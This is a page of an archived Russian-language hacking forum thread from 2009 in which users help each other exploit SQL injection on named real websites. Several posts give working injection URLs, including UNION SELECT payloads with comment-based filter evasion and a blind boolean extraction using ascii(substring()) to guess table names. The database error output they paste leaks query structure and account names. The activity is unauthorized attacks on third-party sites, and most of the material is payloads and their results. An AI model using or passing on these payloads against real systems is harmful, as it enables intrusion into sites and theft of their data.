ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 753 из 1393 « Первая < 253653703743 749 750 751 752 753 754 755 756 757 7638038531253 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7521  
Старый 08.06.2009, 13:55
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
Цитата:
Сообщение от Nizhegorodets  
ребят помогите пожалуйста
на одном сайте есть регалка в которой не фильтруется кавычка при этом база выдает ошибку такого вида



Можно ли чего с этим сделать???
magic quotes экранирует кавычку..
 

  #7522  
Старый 08.06.2009, 14:01
Nizhegorodets
Участник форума
Регистрация: 21.03.2009
Сообщений: 207
Провел на форуме:
554850

Репутация: 119
Отправить сообщение для Nizhegorodets с помощью ICQ
По умолчанию
спасибо пойду гуглить...
 

  #7523  
Старый 08.06.2009, 14:09
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
2 aqqa

http://www.spravkaweb.ru/php'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/'1'='1

Вместо 1 подбирай имя столбца =)
 

  #7524  
Старый 08.06.2009, 15:02
aqqa
Banned
Регистрация: 12.07.2008
Сообщений: 206
Провел на форуме:
801258

Репутация: 33
Отправить сообщение для aqqa с помощью ICQ
По умолчанию
А вот нашел кое что круое

Warning: oci_execute(): ORA-01460: unimplemented or unreasonable conversion requested in /srv/www/apache2/htdocs/cms_adm/lib/44/oracle.class.php on line 95
array (
0 => 'http://www.spravkaweb.ru/php\'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/\'1\'=\'1',
1 => '',
)
аракловская база линуксовый сервак,
 

  #7525  
Старый 08.06.2009, 15:33
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию
Добрый день всем !

Возникли трудности с сайтом! SQL-inj есть а вот вывод настроить не получается...
Доступ к mysql.user и information_schema.columns закрыты =(
http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4--

Как можно обойти это?

Заранее спасибо!
 

  #7526  
Старый 08.06.2009, 16:09
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Snap, там 4 ветка - информатион_счема вообще нету

Юзай мор1ров, подбирай имя таблицы

http://www.delocrat.ru/index.php?productID=1324+and+1=if(ascii(substring( (select+1+from+[имя_табл]+limit+0,1),1,1))>1,1,(select+1+union+select+2))

Либо попробуй найти вывод в других местах
 

  #7527  
Старый 08.06.2009, 16:13
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию
Цитата:
Snap, там 4 ветка - информатион_счема вообще нету
http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +information_schema.columns--

Цитата:
Access denied for user 'delocr01'@'%' to database 'information_schema' SQL query : select photoID, filename, thumbnail, enlarged from SS_product_pictures where photoID!=1483 AND productID=1324 union select 1,2,3,4 from information_schema.columns--
 

  #7528  
Старый 08.06.2009, 16:24
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию
Цитата:
http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +information_schema.columns--
Ты ошибку то читал.....
те так и пишут
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'information_schema.columns--'
 

  #7529  
Старый 08.06.2009, 16:31
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Snap, напиши так

http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from +skjdhfjkshk234k34h.columns--

Будет

Цитата:
Access denied for user 'delocr01'@'%' to database 'skjdhfjkshk234k34h' SQL query : select photoID, filename, thumbnail, enlarged from SS_product_pictures where photoID!=1483 AND productID=1324 union select 1,2,3,4 from skjdhfjkshk234k34h.columns--
Из этого по твоему следует, что существует база skjdhfjkshk234k34h к которой у нас нету доступа ?)
 

  #7530  
Старый 08.06.2009, 19:10
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию
Натолкнулся на mysql инъекцию в многострочном запросе,
Цитата:
SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = 145 [INJECT] GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?
 
 
Страница 753 из 1393 « Первая < 253653703743 749 750 751 752 753 754 755 756 757 7638038531253 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ